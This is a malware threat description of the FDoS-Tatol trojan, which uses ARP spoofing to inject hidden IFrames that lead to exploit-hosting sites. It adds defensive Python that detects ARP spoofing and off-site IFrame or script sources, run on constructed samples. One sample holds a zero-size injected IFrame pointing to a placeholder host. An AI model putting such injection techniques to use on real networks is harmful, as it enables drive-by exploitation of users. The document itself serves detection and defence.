FDoS-Tatol
- Type: Trojan
- SubType: Flooder
- Discovery Date: 05/07/2008
- Length:
- Minimum DAT: 5290 (05/07/2008)
- Updated DAT: 5291 (05/08/2008)
- Minimum Engine: N/A
- Description Added: 05/07/2008
- Description Modified: 05/09/2008 2:17 AM (PT)
Characteristics
FDoS-Tatol uses ARP spoofing on the local LAN to place itself between hosts and the gateway. It sniffs HTTP responses and injects a JavaScript block into the body of the HTML page; the script embeds an IFrame that points to a remote site hosting malicious scripts.
The following sites were found to host these malicious scripts:
- http://user1.33-[removed].net
- http://user3.1a2b[removed].net
The following obfuscated exploit scripts had been detected at the time of investigation:
- JS/Exploit-LianZong - This targets a vulnerability in a popular Chinese game called LianZong. The vulnerability exists in the game's HanGamePluginCn18.dll.
- VBS/Psyme (http://vil.nai.com/vil/content/v_100749.htm)
- Exploit-RealPlay.f (http://vil.nai.com/vil/content/v_143459.htm)
- JS/Exploit-Xunlei - This targets a vulnerability in the Xunlei download tool's pplayer.dll.
Other malware may be downloaded by these exploits.
Symptoms
- Presence of unexpected network connections to previously mentioned URLs.
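Two host-side checks that correspond to the behaviour described under Characteristics and the symptom above, written as an added illustration (not McAfee/AVERT code): one flags ARP replies in which a host other than the known gateway claims the gateway's IP, the other flags IFrame or script elements in a served HTML page whose source is a different host than the page itself. The gateway IP/MAC, the ARP observations and the HTML body are all constructed sample values.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed: the gateway's legitimate address pair, e.g. recorded at a known-good time.
GATEWAY_IP = "192.168.1.1"
KNOWN_GATEWAY_MAC = "00:11:22:33:44:55"

# Constructed ARP observations (sender IP, sender MAC), as a sniffer or a periodic
# ARP-cache poll would report them. The third entry is a LAN host claiming to be the gateway.
SAMPLE_ARP_REPLIES = [
    ("192.168.1.1", "00:11:22:33:44:55"),
    ("192.168.1.20", "aa:bb:cc:dd:ee:01"),
    ("192.168.1.1", "aa:bb:cc:dd:ee:01"),
]


def arp_spoof_alerts(replies, gateway_ip=GATEWAY_IP, known_mac=KNOWN_GATEWAY_MAC):
    """Return the MAC addresses that claim the gateway IP but are not the known gateway MAC."""
    return sorted({mac.lower() for ip, mac in replies
                   if ip == gateway_ip and mac.lower() != known_mac.lower()})


class _SrcCollector(HTMLParser):
    """Collect src attributes of iframe and script tags while parsing an HTML body."""
    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag in ("iframe", "script"):
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)


def offsite_injections(html, page_host):
    """Return iframe/script src values that load from a host other than the page's own.
    Relative sources (no host) are treated as same-origin and not reported."""
    collector = _SrcCollector()
    collector.feed(html)
    return [s for s in collector.srcs
            if urlparse(s).hostname and urlparse(s).hostname != page_host.lower()]


# Constructed HTTP response body with a hidden IFrame of the kind the tool injects;
# remote-host.invalid is a placeholder, not one of the hosts named in this description.
SAMPLE_HTML = """<html><body><h1>News</h1>
<script src="/js/site.js"></script>
<iframe src="http://remote-host.invalid/x.htm" width="0" height="0"></iframe>
</body></html>"""

if __name__ == "__main__":
    print("gateway impersonated by:", arp_spoof_alerts(SAMPLE_ARP_REPLIES))
    print("off-site sources:", offsite_injections(SAMPLE_HTML, "www.example.com"))
```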
Method of Infection
This is a trojan detection. Unlike viruses, trojans do not self-replicate. They are spread manually, often under the premise that they are beneficial or wanted. The most common installation methods involve system or security exploitation, and unsuspecting users manually executing unknown programs. Distribution channels include email, malicious or hacked web pages, Internet Relay Chat (IRC), peer-to-peer networks, etc.
The tool can also propagate exploits by using ARP spoofing to inject scripts into HTML pages.
Removal
AVERT recommends always using the latest DATs and engine. This threat will be cleaned if you have this combination.
Variants
N/A